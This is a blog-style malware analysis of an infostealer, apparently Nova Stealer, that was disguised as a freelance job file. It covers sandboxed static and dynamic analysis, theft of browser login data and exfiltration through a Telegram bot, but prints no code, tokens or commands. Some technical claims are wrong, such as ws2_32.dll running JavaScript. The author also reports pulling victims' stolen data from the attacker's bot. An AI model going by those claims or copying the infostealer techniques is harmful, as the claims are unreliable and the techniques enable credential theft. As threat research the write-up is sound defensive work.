In-Depth Malware Analysis of Nova Stealer v12.5: Uncovering the Threat Behind ‘Manage Facebook ads strategy.exe’

6 min readJul 13, 2024

So, one of my friends got a job offer on one of the freelance websites, the job offeror sent him a file as a work-related file an exe file, my friend was suspicious because the job offeror refused to send the file using the platform and sent him a download link instead to my friend’s personal email, so my friend told me to analyze the executable and see what its actually doing, BTW he didn't open it, he didn't even extract it on his PC he used a sandbox and isolated PC to extract the zip file.

Starting with static analysis:

Extracting the zip file.

File hash

First step i did was to upload the file on VirusTotal

No detection.

I took a look on file version

it looks disgustingly legit file, but if you search for Hihi you wont find anything about it, but the copyright is from Git, which makes it looks more legit.

Using file to know what file type

It is a nullsoft installer file, now i am going to extract it using 7z.

Extracting app-64.7z

Looks like we got another executable file lets upload it to virustotal.

also no detection.

we got some imports which looks suspicious like ws2_32.dll which is used to run javascript code, ffmpeg.dll is a external dll that is inside the installer

we can see here the functions used with ws2_32.dll which looks suspicious, we can see connect, gethostname, bind, getaddrinfo which obviously used in network communications.

we can see here also winhttp.dll is used in http communication

in resources folder we can find another executable elevate.exe

we can see here that is uses shell32.dll and ShellExecuteExW which is used in windows to run commands

BTW app.asar is a electron project compressed that contains all codes used in a electron project after extracting it it contained a heavy obfuscated JavaScript file that is probably the malicious code but it was too obfuscated to deobfuscate.

I didn't use a decompiler on hihi.exe because it is pretty big 165MB and i am sure it will be heavily obfuscated so it was not worth it.

gibberish in strings we cannot see any readable strings.

Now for the dynamic analysis

I used some common monitoring tools:

procwatch, dirwatch, procmon, process hacker 2, Microsoft Netmon 3.4 and wireshark

another thing i found it disables taskmanager

Dirwatch shows interacting with browsers data like Login data which obviously means i am dealing with a infostealer malware, we can see last zip file saved in temp lets go there

inside the zip file

and then we can confirm that credentials is being exfilled

ofc i am running the malware in a sandbox vm so nothing was in those files

Now, i know the main objective of this malware now let’s know how this malware send those data.

i used netmon to capture traffic of the malware

i found a domain and it is an api related to the malware its probably a api based c2

i visited it

clearly an api

we can see it communicated with api.telegram.org, which is a common usage of adversaries to send exfiltrated data to a telegram chat or bot

process hacker 2 has a feature makes you able to read strings of a process while it is running which is very useful because when an obfuscated program gets loaded in memory becomes deobfuscated.

searching for string telegram

i found a telegram bot token and a chat id which is the bot that receives the exfilled data

Using a telegram OSINT tool to get more info about a telegram bot i was able to identify the bot used to receive and store the stolen data from all victims and i was able to download some data from the bot chat